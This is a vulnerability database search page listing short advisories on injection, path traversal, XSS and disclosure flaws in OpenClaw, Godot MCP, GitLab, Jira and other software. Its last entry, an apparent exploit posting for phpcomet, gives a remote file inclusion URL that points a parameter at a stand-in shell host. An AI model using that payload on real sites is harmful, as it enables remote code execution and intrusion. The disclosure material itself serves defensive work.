35 matches found
CVE-2026-25157 OpenClaw/Clawdbot has OS Command Injection via Project Root Path in sshNodeCommand
OpenClaw is a personal AI assistant. Prior to version 2026.1.29, there is an OS command injection vulnerability via the Project Root Path in sshNodeCommand. The sshNodeCommand function constructed a shell script without properly escaping the user-supplied project path in an error message. When th...
PT-2026-6322
Name of the Vulnerable Software and Affected Versions Godot MCP versions prior to 0.1.1 Description Godot MCP is a Model Context Protocol MCP server for interacting with the Godot game engine. A command injection issue in godot-mcp allows remote code execution. The executeOperation function passe...
CVE-2025-10344 HTML injection in Perfex CRM
HTML injection vulnerability in Perfex CRM v3.2.1 consisting of a stored HTML injection due to lack of proper validation of user input by sending a POST request in the parameters 'name' and 'clientid' at the endpoint '/projects/project/x'...
Linux Distros Unpatched Vulnerability : CVE-2024-8974
The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - Information disclosure in Gitlab EE/CE affecting all versions from 15.6 prior to 17.2.8, 17.3 prior to 17.3.4, and 17.4 prior to 17.4.1 in specific conditions i...
CVE-2024-53982 Arbitrary file download in Zoo-Project Echo Example
ZOO-Project is a C-based WPS Web Processing Service implementation. A path traversal vulnerability was discovered in Zoo-Project Echo example. The Echo example available by default in Zoo installs implements file caching, which can be controlled by user-given parameters. No input validation is...
BIT-GITLAB-2024-8974 Incorrect Provision of Specified Functionality in GitLab
Information disclosure in Gitlab EE/CE affecting all versions from 15.6 prior to 17.2.8, 17.3 prior to 17.3.4, and 17.4 prior to 17.4.1 in specific conditions it was possible to disclose to an unauthorised user the path of a private project."...
UBUNTU-CVE-2024-8974
Information disclosure in Gitlab EE/CE affecting all versions from 15.6 prior to 17.2.8, 17.3 prior to 17.3.4, and 17.4 prior to 17.4.1 in specific conditions it was possible to disclose to an unauthorised user the path of a private project."...
CVE-2024-8974 Incorrect Provision of Specified Functionality in GitLab
Information disclosure in Gitlab EE/CE affecting all versions from 15.6 prior to 17.2.8, 17.3 prior to 17.3.4, and 17.4 prior to 17.4.1 in specific conditions it was possible to disclose to an unauthorised user the path of a private project."...
PT-2024-6704 · Gitlab · Gitlab
Name of the Vulnerable Software and Affected Versions: GitLab versions 15.6 through 17.2.7 GitLab versions 17.3 through 17.3.3 GitLab versions 17.4 through 17.4.0 Description: The issue is related to errors in representation of given functions in the GitLab platform, allowing a remote attacker to...
CVE-2024-25222
Task Manager App v1.0 was discovered to contain a SQL injection vulnerability via the projectID parameter at /TaskManager/EditProject.php...
UBUNTU-CVE-2019-15578
An information disclosure exists in 12.3.2, 12.2.6, and 12.1.12 for GitLab Community Edition CE and Enterprise Edition EE. The path of a private project, that used to be public, would be disclosed in the unsubscribe email link of issues and merge requests...
CVE-2019-15578
Removed by vendor...
FreeBSD : Gitlab -- Multiple Vulnerabilities (b17c86b9-e52e-11e9-86e9-001b217b3468)
SO-AND-SO reports : XSS in Markdown Preview Using Mermaid Bypass Email Verification using Salesforce Authentication Account Takeover using SAML Uncontrolled Resource Consumption in Markdown using Mermaid Disclosure of Private Project Path and Labels Disclosure of Assignees via Milestones Disclosu...
Reflected xss in the jira-gadgets-plugin getLabelGroups rest resource
The jira-gadgets-plugin LabelsResource class exposes a getLabelGroups rest resource that is vulnerable to reflected xss through the user supplied 'project' path parameter. The vulnerability is caused by building an error response message with a content type of text/html and not html encoding the...
phpcomet-rfi.txt
Discovered by: MasTerX ---------------- Bug in : comet/example/gamedemo/inc.functions.php Vlu Code : include$projectPath."/inc.var.php"; http://site.com/path/example/gamedemo/inc.functions.php?projectPath=http://SHELLURL.COM?...